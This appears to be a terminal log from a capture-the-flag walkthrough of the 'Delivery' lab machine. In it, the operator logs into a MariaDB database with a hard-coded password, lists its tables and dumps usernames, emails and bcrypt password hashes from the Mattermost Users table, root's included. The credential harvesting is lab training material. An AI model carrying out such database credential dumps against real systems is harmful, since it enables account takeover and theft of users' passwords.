maildeliverer@Delivery:~$ mysql -u mmuser -pCrack_The_MM_Admin_PW -D mattermost
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 86
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [mattermost]> 




MariaDB [mattermost]> SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE';
...
46 rows in set (0.004 sec)


see a `Users` table under `TABLE NAME`




MariaDB [mattermost]> SELECT Username,Password,Email from Users;
+----------------------------------+--------------------------------------------------------------+-------------------------+
| Username                         | Password                                                     | Email                   |
+----------------------------------+--------------------------------------------------------------+-------------------------+
| surveybot                        |                                                              | surveybot@localhost     |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | 4120849@delivery.htb    |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | 7466068@delivery.htb    |
| delivery                         | $2a$10$eLWoCAkGb/vig.zsStdii.LDJSxuUBltjb/BE58HjxCwtBroo63.i | 4031424@delivery.htb    |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | root@delivery.htb       |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | 9122359@delivery.htb    |
| channelexport                    |                                                              | channelexport@localhost |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | 5056505@delivery.htb    |
+----------------------------------+--------------------------------------------------------------+-------------------------+
8 rows in set (0.001 sec)

MariaDB [mattermost]> 
